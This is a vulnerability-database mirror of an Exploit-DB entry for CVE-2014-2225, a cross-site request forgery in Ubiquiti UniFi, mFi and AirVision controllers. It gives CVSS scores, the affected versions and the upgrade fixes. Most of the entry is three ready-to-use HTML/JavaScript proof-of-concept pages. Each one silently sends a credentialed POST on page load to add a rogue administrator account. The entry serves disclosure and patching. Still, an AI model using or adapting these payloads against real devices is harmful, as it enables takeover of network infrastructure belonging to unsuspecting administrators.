Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSeth ArtEDB-ID:34187
HistoryJul 28, 2014 - 12:00 a.m.

Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery

2014-07-2800:00:00
Seth Art
www.exploit-db.com
48

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

73.1%

JSON
# Vendor Homepage: (http://www.ubnt.com/)

# Tested on: Kali Linux
-----------------------------------------
Affected Products/Versions:
-----------------------------------------
UniFi Controller v2.4.6
mFi Controller v2.0.15
AirVision Controller v2.1.3
Note: Previous versions may be affected


-----------------
Description:
-----------------
Title: Cross-site Request Forgery (CSRF)
CVE: CVE-2014-2225
CWE: http://cwe.mitre.org/data/definitions/352.html


Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
Researcher: Seth Art - @sethsec

---------------
UniFi POC:

---------------

<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:8443/api/add/admin"

var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"

var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;


charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}

</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!

<body onload="sendCSRF()">

</body>

-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"


var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"

var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);


xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";


xmlhttp.send(post_data);
}

</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>



--------------------

AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"


var post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”


var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");


xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}

</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">


</body>



-------------
Solution:
-------------
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:

The application name changed from AirVision to UniFi Video)

Related

nvd 1
exploitpack 1
packetstorm 1
seebug 1
prion 1
zdt 1
cvelist 1
cve 1
nvd
nvd
CVE-2014-2225
2020-02-08 16:15:10
exploitpack
exploitpack
Ubiquiti UbiFi mFi AirVision - Cross-Site Request Forgery
2014-07-28 00:00:00
packetstorm
packetstorm
UniFi / mFi / AirVision Cross Site Request Forgery
2014-07-24 00:00:00
seebug
seebug
Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability
2014-07-29 00:00:00
prion
prion
Cross site request forgery (csrf)
2020-02-08 16:15:00
zdt
zdt
Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability
2014-08-01 00:00:00
cvelist
cvelist
CVE-2014-2225
2020-02-08 15:56:28
cve
cve
CVE-2014-2225
2020-02-08 16:15:10

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

73.1%

JSON
Related for EDB-ID:34187
nvd1exploitpack1packetstorm1seebug1prion1zdt1cvelist1cve1